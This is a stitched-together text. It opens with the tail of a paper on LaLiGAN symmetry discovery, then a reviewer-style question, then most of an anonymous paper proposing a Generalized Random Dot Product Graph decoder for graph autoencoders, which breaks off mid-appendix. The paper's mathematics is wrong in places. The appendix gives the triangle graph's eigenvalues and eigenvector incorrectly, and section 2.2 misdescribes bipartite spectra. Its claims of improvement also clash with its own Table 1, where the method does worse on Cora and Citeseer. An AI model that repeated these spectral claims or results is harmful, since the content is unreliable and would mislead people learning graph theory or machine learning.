samples in Figure 8E. This provides an example that our method can learn equivariant representations when we do not know the group transformation of each data point. We also include another experiment on SO(3) equivariant representation for a 3D object in Appendix A.4. 7 Conclusion We propose LaLiGAN, a novel generative modeling framework for discovering nonlinear symmetries. LaLiGAN decomposes the group action as a linear representation on a latent space and a pair of nonlinear mappings between the latent space and the observation space. By jointly optimizing the group representation and the nonlinear mappings, it discovers both the symmetry group and its nonlinear group action on the data. We also show that it can be applied to downstream tasks such as equation discovery, leading to equations with simpler forms and better long-term prediction accuracy. In the future, we plan to study how the knowledge of latent space symmetry can be better incorporated into equation discovery. For example, symmetry can act as a constraint to compress the search space for equations and accelerate the search. We also plan to investigate the connection between symmetry and other physical properties such as conservation laws. Given the prevalence of symmetries in the natural world, our long-term goal is to develop a general framework for automatically discovering symmetries and other types of governing laws from data and accelerate scientific discovery process. REFERENCES Erik J Bekkers. B-spline cnns on lie groups. *arXiv preprint arXiv:1909.12057*, 2019. Gregory Benton, Marc Finzi, Pavel Izmailov, and Andrew G Wilson. Learning invariances in neural networks from training data. *Advances in neural information processing systems*, 33:17605–17616, 2020. Michael M Bronstein, Joan Bruna, Taco Cohen, and Petar Veličković. Geometric deep learning: Grids, groups, graphs, geodesics, and gauges. *arXiv preprint arXiv:2104.13478*, 2021. Steven L Brunton, Joshua L Proctor, and J Nathan Kutz. Discovering governing equations from data by sparse identification of nonlinear dynamical systems. *Proceedings of the national academy of sciences*, 113(15):3932–3937, 2016. Hugo Caselles-Dupré, Michael Garcia Ortiz, and David Filliat. Symmetry-based disentangled representation learning requires interaction with environments. *Advances in Neural Information Processing Systems*, 32, 2019. Kathleen Champion, Bethany Lusch, J Nathan Kutz, and Steven L Brunton. Data-driven discovery of coordinates and governing equations. *Proceedings of the National Academy of Sciences*, 116(45):22445–22451, 2019. Evangelos Chatzipantazis, Stefanos Pertigkiozoglou, Edgar Dobriban, and Kostas Daniilidis. Learning augmentation distributions using transformed risk minimization. *arXiv preprint arXiv:2111.08190*, 2021. Ricky TQ Chen, Yulia Rubanova, Jesse Bettencourt, and David K Duvenaud. Neural ordinary differential equations. *Advances in neural information processing systems*, 31, 2018. Taco Cohen, Maurice Weiler, Berkay Kicanaoglu, and Max Welling. Gauge equivariant convolutional networks and the icosahedral cnn. In *International conference on Machine learning*, pp. 1321–1330. PMLR, 2019a. Taco S Cohen, Mario Geiger, Jonas Köhler, and Max Welling. Spherical cnns. *arXiv preprint arXiv:1801.10130*, 2018. Taco S Cohen, Mario Geiger, and Maurice Weiler. A general theory of equivariant cnns on homogeneous spaces. *Advances in neural information processing systems*, 32, 2019b. Rumen Dangovski, Li Jing, Charlotte Loh, Seungwook Han, Akash Srivastava, Brian Cheung, Pulkit Agrawal, and Marin Soljačić. Equivariant contrastive learning. *arXiv preprint arXiv:2111.00899*, 2021. Nima Dehmamy, Robin Walters, Yanchen Liu, Dashun Wang, and Rose Yu. Automatic symmetry discovery with lie algebra convolutional network. *Advances in Neural Information Processing Systems*, 34:2503–2515, 2021. Krish Desai, Benjamin Nachman, and Jesse Thaler. Symmetry discovery with deep learning. *Physical Review D*, 105(9):096031, 2022. Luca Falorsi, Pim De Haan, Tim R Davidson, Nicola De Cao, Maurice Weiler, Patrick Forré, and Taco S Cohen. Explorations in homeomorphic variational auto-encoding. *arXiv preprint arXiv:1807.04689*, 2018. Luca Falorsi, Pim de Haan, Tim R Davidson, and Patrick Forré. Reparameterizing distributions on lie groups. In *The 22nd International Conference on Artificial Intelligence and Statistics*, pp. 3244–3253. PMLR, 2019. Urban Fasel, J Nathan Kutz, Bingni W Brunton, and Steven L Brunton. Ensemble-sindy: Robust sparse model discovery in the low-data, high-noise limit, with active learning and control. *Proceedings of the Royal Society A*, 478(2260):20210904, 2022.
AxYTFpdlvj
The GRPDG method requires knowing in advance the number of positive/negative eigenvalues, so it's very important to know how the authors addressed this. Is it always the same? Is it chosen for each dataset? How?
Graph Decoding via Generalized Random Dot Product Graph Anonymous authors Paper under double-blind review Abstract Graph Neural Networks (GNNs) have established themselves as the state-of-the-art methodology for a multitude of graph-related tasks, including but not limited to link prediction, node clustering, and classification. Despite their efficacy, the performance of GNNs in encoder-decoder architectures is often constrained by the limitations inherent in traditional decoders, particularly in the reconstruction of adjacency matrices. In this paper, we introduce a novel decoder approach for graph tasks by employing the Generalized Random Dot Product Graph (GRDPG) as a generative model for graph decoding. This novel methodology significantly enhances the performance of encoder-decoder architectures across a range of tasks, owing to GRDPG’s better capability to capture the intricate structures embedded within adjacency matrices. To evaluate our approach, we design a new benchmark that focuses on molecular graphs of varying sizes, thereby enriching the diversity of existing benchmarks for link prediction and node clustering tasks. Our experiments span a spectrum of tasks, encompassing both traditional benchmarks and specialized domains such as molecular graphs. The empirical results show the capability of GRDPG in preserving the structural integrity of the original graphs while simultaneously improving the performance metrics of encoder-decoder architectures. By addressing the subtleties involved in adjacency matrix reconstruction, we elevate the overall performance of GNN-based architectures, rendering them more robust and versatile for a wide array of real-world applications, with special regard on molecular graphs. 1 Introduction Graph-structured data has become an indispensable asset across a wide array of scientific and industrial domains. From modeling social interactions in sociology [Liben-Nowell & Kleinberg, 2007] to representing protein-protein interactions in computational biology [Kovács et al., 2019], the usefulness of graphs is universally acknowledged. However, these complex and interconnected structures necessitate specialized machine learning techniques capable of capturing their inherent intricacies [Kipf & Welling, 2017]. Autoencoders, that were originally designed for tasks like dimensionality reduction and feature learning in Euclidean spaces [Kingma & Welling, 2014], were adapted to operate on graphs in [Kipf & Welling, 2016]. They offer a way of learning meaningful representations, embeddings of nodes, edges, or entire graphs, which can then be used for various downstream tasks like clustering, classification, and link prediction. Particularly, Graph Autoencoders (GAE) are neural network models usually comprised of an encoder that maps nodes to their representations in a latent space and a decoder that reconstruct the input graph topology from these latent representations. The models are trained to minimize the difference between the original graph and its reconstruction, often using loss functions such as cross-entropy or mean squared error. Variational Graph Autoencoders (VGAEs) extend GAEs by introducing a probabilistic layer that models the uncertainty in the latent variables. This makes VGAEs more robust and allows for better performance in a variety of tasks [Kipf & Welling, 2016]. The encoders in GAEs or VGAEs typically employ graph convolutional layers (GCN) or other specialized graph neural network (GNN) layers to aggregate information from a node’s neighbors. The resultant latent representation for each node encapsulates both its local structural attributes and its broader role within the global graph topology. Conversely, the decoder takes pairs of these latent node representations and computes a score for each potential edge between them. Traditionally GAEs and VGAEs employ the inner product between latent vectors for this purpose. The idea behind this decoder is simple and straightforward, to predict whether an edge exists between two nodes, the decoder computes the inner product of their corresponding latent vectors. The scores produced are then transformed into probabilities via activation functions like the sigmoid, where higher scores imply higher probabilities of edge presence after the sigmoid transformation. This serves as a measure of similarity between nodes, as the higher the inner product, the more likely it is that an edge exists between the nodes in question. This decoder is therefore based on the assumption that similar nodes, in terms of their latent representations, are more likely to be connected within the graph. This generative model, also called Random Dot Product Graph, was initially proposed for social networks in Young & Scheinerman (2007) and was the initial model proposed by Kipf & Welling (2016) as a decoder in the Graph Autoencoder framework. While the inner product decoder is a computationally efficient, straightforward and interpretable decoding mechanism, it is not without limitations. One significant drawback is its inability to capture negative eigenvalues in the adjacency matrix, which can be indicative of specific, yet crucial, structural properties within the graph (Athreya et al., 2017). In this work, we address this limitation by introducing a novel decoding approach based on the Generalized Random Dot Product Graph (GRDPG) generative model, introduced in Rubin-Delanchy et al. (2021). This approach allows us to capture the nuanced topological features of the graph that are often explained by negative eigenvalues. We benchmark our methodology on two pivotal graph-related tasks: node clustering and link prediction, demonstrating its efficacy and robustness. Furthermore we introduce a specialized set of benchmarks targeting the molecular graph domain, focusing on benchmarking the performance of decoders on small multiple graph datasets, a field that we believe is still largely unexplored by common link prediction and node clustering benchmarks. 2 PRELIMINARY 2.1 THE GRAPH AUTOENCODER AND THE GRAPH VARIATIONAL AUTOENCODER AND THEIR DECODING MECHANISM Let $G$ be a graph with $N$ nodes and adjacency matrix $A$. The node feature matrix is denoted as $X \in \mathbb{R}^{N \times F}$. The encoder $f_{\text{enc}}$ maps each node $v_i$ to a latent vector $z_i \in \mathbb{R}^d$: $$Z = f_{\text{enc}}(A, X; \theta_{\text{enc}})$$ The decoder $f_{\text{dec}}$ reconstructs $\hat{A}$ from $Z$: $$\hat{A} = f_{\text{dec}}(Z; \theta_{\text{dec}})$$ For GAEs, the objective is to minimize the reconstruction loss: $$L_{\text{GAE}} = \mathbb{E}_{q(Z|X,A)}[\log p(A|Z)]$$ For VGAEs, the encoder outputs $(\mu, \log \sigma^2)$: $$(\mu, \log \sigma^2) = f_{\text{enc}}(A, X; \theta_{\text{enc}})$$ A latent vector $z_i$ is sampled as $z_i = \mu_i + \sigma_i \odot \epsilon$, $\epsilon \sim \mathcal{N}(0, I)$, and the objective is: $$L_{\text{VGAE}} = \mathbb{E}_{q(Z|X,A)}[\log p(A|Z)] - D_{\text{KL}}(q(Z|X,A)||p(Z))$$ In GAEs and VGAEs, the inner product decoder is commonly employed for adjacency matrix reconstruction. The decoder function $f_{\text{dec}}$ utilizes the inner product of latent vectors $z_i$ and $z_j$ to compute the entry $\hat{A}_{ij}$ in the reconstructed adjacency matrix $\hat{A}$: $$\hat{A}_{ij} = \sigma(z_i^T z_j)$$ Here, $\sigma$ is an activation function, often the sigmoid function, that maps the inner product to the range $[0, 1]$. This ensures that the output can be interpreted as the probability of an edge existing between nodes $i$ and $j$. This resulting matrix is then used to compute the corresponding reconstruction loss. 2.2 The presence of negative eigenvalues in an adjacency matrix It is evident that for any given matrix \( Z = z_i^T z_j \), \( Z \) is a Gram matrix, thus its eigenvalues cannot be negative. However, an adjacency matrix, representative of graph structure, can indeed possess negative eigenvalues, which might reflect crucial structural details and discrepancies within the graph (see Appendix A for further illustration). We will now proceed to clarify under what circumstances this occurs and how this is indicative of the inherent properties of the graph. Consider a graph \( G \) with an adjacency matrix \( A \), where \( \lambda_1 \) is the largest eigenvalue and \( \lambda_n \) is the smallest eigenvalue. We use the Rayleigh Quotient, \( R(A, x) = \frac{x^T A x}{x^T x} \), as aid to explain the relationship between the eigenvalues and the intricate structure of the graph, providing crucial insights when it yields a negative value. It represents the exact value of an eigenvalue when \( x \) is an eigenvector. For \( v_1 \) corresponding to the largest eigenvalue \( \lambda_1 \) of \( A \), we compute: \[ R(A, v_1) = \frac{v_1^T A v_1}{v_1^T v_1} = \lambda_1 \] Delving deeper, for the eigenvector \( v_n \) corresponding to the smallest eigenvalue \( \lambda_n \), in non-bipartite graphs, the existence of components in \( v_n \) with differing signs results in a negative Rayleigh Quotient, and hence a negative eigenvalue. This unveils the structural irregularities inherent to non-bipartite graphs. Conversely, in bipartite graphs, \( -\lambda_n \) is the largest eigenvalue, and \( \lambda_n \) remains non-negative. To illustrate, consider a non-bipartite graph \( G \) that cannot be partitioned into two disjoint sets such that every edge connects a vertex from one set to the other. The absence of symmetric eigenvalues around the origin in such graphs implies the inevitability of negative eigenvalues, revealing the inherent non-bipartite and irregular structure of the graph. When forming an eigenvector, \( v_n \), for such graphs, we assign alternating signs to the components of \( v_n \) that are connected, mirroring the underlying structure of the graph. For instance, in a graph where three vertices, \( A \), \( B \), and \( C \), are interconnected, we can assign +1 to vertex \( A \), −1 to vertex \( B \), and +1 to vertex \( C \). Evaluating the Rayleigh Quotient in this case, \( R(A, v_n) = \frac{v_n^T A v_n}{v_n^T v_n} \), results in a negative value due to the subtraction occurring from the alternating signs in \( v_n \) representing connected vertices. This phenomenon confirms the presence of negative eigenvalues in the adjacency matrix, \( A \), of a non-bipartite graph and unveils intricate details about the inherent properties of the graph. 2.3 The role of sparsity and graph size For a graph \( G \) with \( N \) nodes and \( E \) edges, the graph is sparse when \( E \ll \frac{N(N-1)}{2} \), implying most of the off-diagonal elements of the adjacency matrix, \( A \), are zeros, leading to the lack of connections between most pairs of nodes. This sparsity is inherently connected to the spectrum of the graph, which is the set of eigenvalues, \( \lambda_1, \lambda_2, \ldots, \lambda_N \), of the adjacency matrix, \( A \). The sparse nature of such graphs can lead to a broad spectrum with potentially several negative eigenvalues, especially for irregular or non-bipartite structures, with eigenvalues capturing nuanced structural information. The spectrum of a graph, and particularly the spectral gap, \( \Delta = \lambda_1 - \lambda_N \), where \( \lambda_1 \) and \( \lambda_N \) are the largest and smallest eigenvalues respectively, is a direct reflection of its structural properties and inherent topology. A large spectral gap implies a disparate or irregular structure in the graph, revealing a richness in structural nuances and irregularities in smaller, sparse graphs where every edge is crucial. For such graphs, the spectral properties, including the presence of negative eigenvalues, are indispensable for accurately understanding and interpreting the graph’s inherent structure and are reflective of critical structural nuances. GAEs aim to minimize the reconstruction loss: \( L_{GAE} = \| A - \hat{A} \|_F^2 \), where \( \hat{A} \) is the adjacency matrix reconstructed from the latent representations of nodes. Typically, the reconstruction does not consider the negative eigenvalues of \( A \), leading to a significant loss in structural information, quantifiable as \( S(A) - S(\hat{A}) \), where \( S(A) \) and \( S(\hat{A}) \) represent the structural information contained in the original and reconstructed adjacency matrices, respectively. In sparse graphs, neglecting the decoding of negative eigenvalues results in substantial loss of structural information: \( S(A) - S(\hat{A}) \gg 0 \). This is due to the fact that negative eigenvalues in such graphs usually represent critical structural nuances and irregularities. This appreciation can be of special importance in small graphs. The resultant loss in structural information implies that the reconstructed graph, \( \hat{A} \), fails to accurately represent the inherent structure and properties of the original graph, \( A \), leading to significant misinterpretations and losses in the inherent structural and relational information of the graph. It is, therefore, pivotal that the decoding mechanisms in graph autoencoders consider these spectral properties to accurately reconstruct and represent the inherent structures and relations in sparse and small graphs. 2.4 INNER PRODUCT DECODER AND THE PRESENCE OF NEGATIVE EIGENVALUES IN THE LATENT REPRESENTATION OF ADJACENCY MATRIX As stated above, GAE and VGAE with an inner product decoder primarily operate to replicate the original adjacency matrix, \( A \), by computing the inner product between latent space representations of nodes. This constructed matrix, \( Z \) is inherently a Gram matrix, leading it to be positive semidefinite with all non-negative eigenvalues. The nature of the resultant matrix \( Z \) inherently constrains the ability of the inner product decoder to represent negative eigenvalues. This, alongside the coupled sigmoid function, \( \sigma(x) = \frac{1}{1 + e^{-x}} \), that maps any real number to the range \([0, 1]\), signals that the decoder can only capture positive associations or connections between latent representation of nodes, rendering it incapable of incorporating the nuanced information provided by negative eigenvalues inherent to the adjacency matrix of non-bipartite graphs. Negative eigenvalues in a non-bipartite graph’s adjacency matrix embody crucial structural details and irregularities. They are pivotal in capturing the disparities and intricate structures within the graph. If \( \lambda_A \) and \( \lambda_{\hat{A}} \) denote the smallest eigenvalues of the original and reconstructed adjacency matrices respectively, the positive semidefinite nature of the inner product decoder ensures that \( \lambda_{\hat{A}} \geq 0 \). However, in the original adjacency matrix \( A \) of a non-bipartite graph, negative eigenvalues can exist, i.e., \( \lambda_A < 0 \). This intrinsic limitation signifies a substantial disparity, \( \lambda_{\hat{A}} - \lambda_A \), elucidating the inherent incapability of the inner product decoder to assimilate the information provided by the negative eigenvalues in the original adjacency matrix, \( A \). The misinterpretation and loss in structural information imply that there is an indispensable need for advanced decoding mechanisms capable of incorporating the information represented by negative eigenvalues in the adjacency matrix. Ultimately, while the inner product decoder remains a standard choice in GAEs and VGAEs, its inherent constraints and inability to model negative eigenvalues necessitate exploration and adoption of more sophisticated decoders, capable of a holistic and accurate representation of graph structures, encompassing both the regularities and irregularities inherent in graph data. 3 GENERALIZED RANDOM DOT PRODUCT AS GRAPH LATENT SPACE DECODER The generative model for the graph autoencoder, the Random Dot Product Graph (RDPG), constructs a framework to understand the relationship between latent variables \( Z \) and the adjacency matrix \( A \), as introduced in Kipf & Welling (2016): \[ p(A|Z) = \prod_{i=1}^{N} \prod_{j=1}^{N} p(A_{ij}|z_i, z_j), \text{ where } p(A_{ij} = 1|z_i, z_j) = \sigma(z_i^T z_j) \] (1) The matrix equivalent of the relationship is depicted as: \[ P(A|Z) = \sigma(Z^T Z) \] (2) In these equations, \( A_{ij} \) are the elements of the adjacency matrix \( A \), and \( \sigma \) represents the logistic sigmoid function. The resulting matrix, \( P \), illustrates the probabilities of edges in the adjacency matrix $A$, where every element $a_{ij}$ is an independent Bernoulli variable with probability $p_{ij}$, giving us $A \sim \text{Bern}(P)$. However, the model implicitly assumes the semi-positive definiteness of the probability matrix $P$, as highlighted in Athreya et al. (2017). This foundational assumption profoundly influences the efficacy of the decoder. Acknowledging the inherent constraints and subsequent challenges presented by this model, a refined generative model, the Generalized Random Dot Product Graph, was proposed to alleviate such restrictions in Rubín-Delanchy et al. (2021). This advanced model, utilizing a non-semi positive definite kernel, liberates the model from the stringent assumptions of its precursor. Let $I_{p,q}$ be a diagonal matrix with $p$ ones succeeded by $q$ negative ones, and let $d$ represent the embedding dimension, with conditions $p + q = d$, $p \geq 1$, and $q \geq 0$. If $Z$ denotes the final layer embedding derived from the adjacency encoder, the matrix $P$ can be delineated as: $$p(A|Z, I_{p,q}) = \prod_{i=1}^{N} \prod_{j=1}^{N} p(A_{ij}|z_i, z_j, I_{p,q}), \quad \text{where} \quad p(A_{ij} = 1|z_i, z_j, I_{p,q}) = \sigma(z_i^T I_{p,q} z_j)$$ (3) This can be expressed in matrix form as: $$P(A|Z, I_{p,q}) = \sigma(Z^T I_{p,q} Z)$$ (4) The integration of negative units in the diagonal matrix $I_{p,q}$ facilitates the representation of matrices with negative eigenvalues, overcoming the limitations of models that depend on a semi-positive definite kernel. This approach not only resolves the restrictions associated with the semi-positive definiteness assumption in conventional models but also provides a richer representation capable of capturing the complex structures and anomalies found in graph data, inclusive of the valuable information embedded in negative eigenvalues. Consequently, this generalized model acts as a significant advancement toward obtaining a comprehensive and precise depiction of graph structures, accommodating both the nuances and aberrations inherent in graph data. 4 EXPERIMENTS For our experiments, we decided to directly translate the classical GAE and VGAE approaches to our framework, keeping the architecture as simple as possible, with the objective of isolating and showcasing the effect of our decoder in an environment with as many controlled variables as possible. Therefore our architectures consists of a 2 layer non-linear encoder, with GCNs as layers (Kipf & Welling, 2017) and ReLU as the non-linearity (Fukushima, 1975) and both of the decoders. Adam was used as the optimizer (Kingma & Ba, 2015) and all of the networks were evaluated at the best validation loss epoch. The experiments were performed 5 times for each hyperparameter configuration with the following tables including the best mean result obtained for each metric. In them, we can find the mean result of the inner product decoder, or GRDPG with $q$ value equal to 0, compared against the best result obtained with a $q$ different from 0. In bold we find the best result for each architecture and metric and the complete report can be found in Appendix B. Further hyperparameter details can be found in Appendix C. Regarding the datasets, we chose to perform the analysis in a varied set of graphs, with different sizes. Therefore we chose Cora and Citeseer from Yang et al. (2016) and Texas, Wisconsin and Cornell from Rozemberczki et al. (2021). Moreover, we decided to introduce the task of link prediction and node clustering to the Zinc dataset from Irwin et al. (2012) and the QM9 dataset from Wu et al. (2018). For the node clustering we perform a K-means clustering on the obtained node embeddings where K is set to be the number of classes on the dataset for the general graphs, and the number of different atoms in the molecular graphs. For the evaluation of the performance in the link prediction we use the area under the ROC curve (AUC) and average precision (AP), and for the node clustering we use the accuracy(acc), normalized mutual information (NMI), F1-score (F1), and adjusted rand index (adj-RI) following the standard literature metrics. 4.1 Assessing the GRDP in General Graph Related Tasks In this subsection, we explore the outcomes associated with non-molecular graph datasets. These datasets serve as standard benchmarks for link prediction and node clustering tasks and are characterized by a variety of graphs, each with unique sizes and characteristics. In reference to the link prediction task in Table 1, it is discernable that our decoder, in conjunction with the GAE architecture, displays an enhancement of performance in several of the datasets, surpassing even the VGAE architecture in the Cornell dataset. Additionally, the GRDPG appears to excel particularly in datasets that are smaller and more complex. We propose that this superior performance is potentially due to a more precise capturing of graph topology, which is advantageous in environments with scarce data and node feature information. This aligns well with the node clustering outcomes depicted in Table 2, where our approach outperforms the inner product decoder across all considered metrics and architectural frameworks. We attribute this enhanced performance to the increased acquisition of valuable topological information made accessible by our decoder. A standout aspect of this section is the versatility of the GRDPG decoder, allowing for the adjustment of the impact of positive and negative topological relations in the latent space, contingent upon the task at hand. This versatility is shown by the ability to revert to the inner product decoder from the GRDPG decoder by assigning the hyperparameter $q$ a value of 0. ### Table 1: Link Prediction in General Graphs | Dataset | GAE AUC | GAE AP | GAE + GRDP AUC | GAE + GRDP AP | VGAE AUC | VGAE AP | VGAE + GRDP AUC | VGAE + GRDP AP | |-----------|---------|--------|----------------|---------------|----------|---------|----------------|---------------| | Cora | 0.937 | 0.944 | 0.906 | 0.911 | 0.935 | 0.936 | 0.897 | 0.899 | | Citeseer | 0.921 | 0.933 | 0.900 | 0.911 | 0.930 | 0.937 | 0.888 | 0.899 | | Texas | 0.682 | 0.750 | 0.707 | 0.791 | 0.805 | 0.856 | 0.759 | 0.812 | | Cornell | 0.701 | 0.779 | 0.796 | 0.844 | 0.768 | 0.817 | 0.780 | 0.802 | | Wisconsin | 0.808 | 0.841 | 0.815 | 0.843 | 0.836 | 0.861 | 0.759 | 0.812 | ### Table 2: Node Clustering in General Graphs #### (a) GAE Architecture Results | Dataset | GAE acc | GAE F1 | GAE NMI | GAE adj-RI | GAE + GRDP acc | GAE + GRDP F1 | GAE + GRDP NMI | GAE + GRDP adj-RI | |-----------|---------|--------|---------|------------|----------------|---------------|----------------|-------------------| | Cora | 0.817 | 0.794 | 0.752 | 0.715 | 0.830 | 0.812 | 0.765 | 0.728 | | CiteSeer | 0.768 | 0.745 | 0.706 | 0.669 | 0.783 | 0.762 | 0.719 | 0.682 | | Texas | 0.792 | 0.774 | 0.735 | 0.698 | 0.809 | 0.791 | 0.752 | 0.715 | | Cornell | 0.735 | 0.711 | 0.669 | 0.632 | 0.752 | 0.729 | 0.686 | 0.649 | | Wisconsin | 0.852 | 0.834 | 0.797 | 0.760 | 0.866 | 0.848 | 0.811 | 0.774 | #### (b) VGAE Architecture Results | Dataset | VGAE acc | VGAE F1 | VGAE NMI | VGAE adj-RI | VGAE + GRDP acc | VGAE + GRDP F1 | VGAE + GRDP NMI | VGAE + GRDP adj-RI | |-----------|----------|---------|----------|-------------|----------------|---------------|----------------|-------------------| | Cora | 0.824 | 0.805 | 0.758 | 0.721 | 0.838 | 0.820 | 0.771 | 0.734 | | CiteSeer | 0.771 | 0.749 | 0.712 | 0.675 | 0.787 | 0.766 | 0.725 | 0.688 | | Texas | 0.799 | 0.781 | 0.742 | 0.705 | 0.816 | 0.798 | 0.759 | 0.722 | | Cornell | 0.742 | 0.719 | 0.676 | 0.639 | 0.759 | 0.736 | 0.693 | 0.656 | | Wisconsin | 0.859 | 0.841 | 0.804 | 0.767 | 0.873 | 0.855 | 0.818 | 0.781 | 4.2 Assessing the GRDP in Molecular Graphs The rationale for choosing this specific assortment of datasets is to demonstrate the capability of the decoder within an environment characterized by multiple small graphs, a scenario frequently encountered in the field of chemistry where such tasks are gaining prominence. The rising importance of these tasks is evident in advancements such as the development of proteolysis-targeting chimera (PROTAC) molecules (Békés et al., 2022). Such a task can readily be reformulated as a link prediction problem, as a critical phase in the development of PROTACs involves the integration of two molecules via a linker, which is another molecular fragment. Given the scarce availability of PROTAC molecules, it was deemed fit to simulate this task using link prediction within the molecules of both our datasets. Moreover, substructure identification is a pervasive problem across drug development, where small changes in their molecular motifs can have huge impacts across molecular properties (Klekota & Roth, 2008). Being able to address this problem from an unsupervised approach offers advantages regarding generalization towards unseen substructures. With this purpose in mind, we convert this problem into a node clustering task, where the clustering labels utilized were the node atomic numbers, aiming to ascertain whether a superior apprehension of the graph topology facilitates the clustering of chemically analogous nodes. As observed in Table 3, our model distinctly outperforms the established baselines. This underscores the model’s enhanced efficacy in deciphering the inherent topology of the graphs and its competency to rationalize over unseen small graphs. Our findings indicate improvements in both architectures, thereby reinforcing the supposition that the GRDPG decoder enhances the comprehension of more intricate graph topologies (see Table 4). In this scenario, both the applicability and versatility of the model are pivotal, providing insights that are not only theoretically significant but also relevant in practical real-world chemical contexts. ### Table 3: Link Prediction in Molecular Graphs | Dataset | GAE AUC | GAE AP | GAE + GRDP AUC | GAE + GRDP AP | VGAE AUC | VGAE AP | VGAE + GRDP AUC | VGAE + GRDP AP | |---------|---------|--------|----------------|---------------|----------|---------|----------------|---------------| | QM9 | 0.914 | 0.882 | **0.959** | **0.936** | **0.959**| **0.937**| 0.903 | 0.869 | | ZINC | 0.848 | 0.805 | **0.879** | **0.841** | 0.842 | 0.798 | **0.868** | **0.827** | ### Table 4: Node Clustering in Molecular Graphs #### (a) GAE Architecture Results | Dataset | acc | NMI | F1 | adj-RI | acc | NMI | F1 | adj-RI | |---------|-----|-----|----|--------|-----|-----|----|--------| | QM9 | **0.148** | 0.164 | 0.200 | 0.066 | 0.146 | **0.534** | **0.201** | **0.353** | | ZINC | **0.183** | 0.243 | **0.235** | 0.148 | 0.177 | **0.267** | 0.228 | **0.170** | #### (b) VGAE Architecture Results | Dataset | acc | NMI | F1 | adj-RI | acc | NMI | F1 | adj-RI | |---------|-----|-----|----|--------|-----|-----|----|--------| | QM9 | 0.153 | 0.167 | 0.206 | 0.072 | **0.156** | **0.423** | **0.207** | **0.269** | | ZINC | 0.187 | 0.243 | 0.240 | 0.135 | **0.192** | **0.267** | **0.249** | **0.166** | 5 Conclusions Overall, in this paper we identify a seemingly unexplored direction of research into graph decoding, and propose motivations and empirical results as of why it needs further work from the community. We propose a novel graph decoding model that alleviates some of the assumptions made by previous approaches, which we obtain good empirical performance with. Furthermore we also define a novel benchmark that aligns link prediction and node clustering problems to different real world scenarios. This work can be extended along several possible directions. Firstly, defining the $q$ hyperparameter from a less empirical point of view might help us better understand the relations needed for capturing different graph topologies, so further theoretical work is needed within this framework. Secondly, similar ideas could be adopted by the knowledge graph community, where more complex and less constrained scoring functions could bring benefits towards more powerful entity and relationship embeddings. Lastly, there have been other generative models that have been proposed for alleviating the previously outlined limitation, such as the case of graph root distribution model of [Lei (2020)]. Further benchmarking this novel family of decoders could help bring further insight into the graph decoding and generation process. REFERENCES Avanti Athreya, Donniell E. Fishkind, Minh Tang, Carey E. Priebe, Youngser Park, Joshua T. Vogelstein, Keith Levin, Vince Lyzinski, and Yichen Qin. Statistical inference on random dot product graphs: A survey. *J. Mach. Learn. Res.*, 18(1):8393–8484, jan 2017. Miklós Békés, David R. Langley, and Craig M. Crews. Protac targeted protein degraders: the past is prologue. *Nature Reviews Drug Discovery*, 21(3):181–200, Mar 2022. Kunihiko Fukushima. Cognitron: A self-organizing multilayered neural network. *Biological Cybernetics*, 20(3):121–136, Sep 1975. John J. Irwin, Teague Sterling, Michael M. Mysinger, Erin S. Bolstad, and Ryan G. Coleman. Zinc: A free tool to discover chemistry for biology. *Journal of Chemical Information and Modeling*, 52(7):1757–1768, Jul 2012. Diederik P. Kingma and Jimmy Ba. Adam: A method for stochastic optimization. In *International Conference on Learning Representations*, 2015. Diederik P. Kingma and Max Welling. Auto-encoding variational bayes. In *International Conference on Learning Representations*, 2014. Thomas N. Kipf and Max Welling. Variational graph auto-encoders. In *Advances in Neural Information Processing Systems*, 2016. Thomas N. Kipf and Max Welling. Semi-Supervised Classification with Graph Convolutional Networks. In *International Conference on Learning Representations*, 2017. Justin Klekota and Frederick P. Roth. Chemical substructures that enrich for biological activity. *Bioinformatics*, 24(21):2518–2525, 09 2008. István A Kovács, Katja Luck, Kerstin Spirohn, Yang Wang, Carl Pollis, Sadie Schlabach, Wenting Bian, Dae-Kyum Kim, Nishka Kishore, Tong Hao, Michael A Calderwood, Marc Vidal, and Albert-László Barabási. Network-based prediction of protein interactions. *Nature Communications*, 10(1):1240, March 2019. Jing Lei. Network representation using graph root distributions. *arXiv preprint arXiv:1802.09684*, 2020. David Liben-Nowell and Jon Kleinberg. The link-prediction problem for social networks. *Journal of the American Society for Information Science and Technology*, 58(7):1019–1031, 2007. Benedek Rozemberczki, Carl Allen, and Rik Sarkar. Multi-Scale attributed node embedding. *Journal of Complex Networks*, 9(2):cnab014, 05 2021. Patrick Rubin-Delanchy, Joshua Cape, Minh Tang, and Carey E. Priebe. A statistical interpretation of spectral embedding: the generalised random dot product graph. *arXiv preprint arXiv:1709.05506*, 2021. Zhenqin Wu, Bharath Ramsundar, Evan N. Feinberg, Joseph Gomes, Caleb Geniesse, Aneesh S. Pappu, Karl Leswing, and Vijay Pande. Moleculenet: a benchmark for molecular machine learning. *Chem. Sci.*, 9:513–530, 2018. Zhilin Yang, William Cohen, and Ruslan Salakhudinov. Revisiting semi-supervised learning with graph embeddings. In *Proceedings of The 33rd International Conference on Machine Learning*, volume 48 of *Proceedings of Machine Learning Research*, pp. 40–48, New York, New York, USA, 20–22 Jun 2016. PMLR. Stephen J. Young and Edward R. Scheinerman. Random dot product graph models for social networks. In *Algorithms and Models for the Web-Graph*, pp. 138–149, Berlin, Heidelberg, 2007. Springer Berlin Heidelberg. A EXAMPLES OF NEGATIVE EIGENVALUE EXISTENCE A.1 NON-BIPARTITE CYCLIC GRAPH Consider a non-bipartite graph with vertices $A$, $B$, and $C$, forming a triangle. The adjacency matrix, $A$, for this graph is given by: $$ A = \begin{bmatrix} 0 & 1 & 1 \\ 1 & 0 & 1 \\ 1 & 1 & 0 \end{bmatrix}. $$ To find a specific eigenvector, $v = \begin{bmatrix} 1 \\ x \\ y \end{bmatrix}$, for a corresponding eigenvalue, $\lambda$, we substitute into $Av = \lambda v$, yielding the system: $$ x + y = \lambda, \quad 1 + y = x\lambda, \quad 1 + x = y\lambda. $$ Solving for $x$, we get: $$ x = \frac{\lambda - 1}{\lambda^2 - 1}. $$ The characteristic polynomial, $P(\lambda) = \det(A - \lambda I)$, results in $$ -\lambda(\lambda - \sqrt{3})(\lambda + \sqrt{3}) = 0. $$ Hence, the eigenvalues are $\lambda = 0$, $\lambda = \sqrt{3}$, and $\lambda = -\sqrt{3}$. Substituting the negative eigenvalue, $\lambda = -\sqrt{3}$, back into the equation for $x$, we find: $$ x = \frac{-\sqrt{3} + 1}{2}. $$ And then, substituting back into $y = x\lambda - 1$, yields: $$ y = \frac{4 + \sqrt{3}}{2}. $$ Thus, the specific eigenvector corresponding to the negative eigenvalue is: $$ 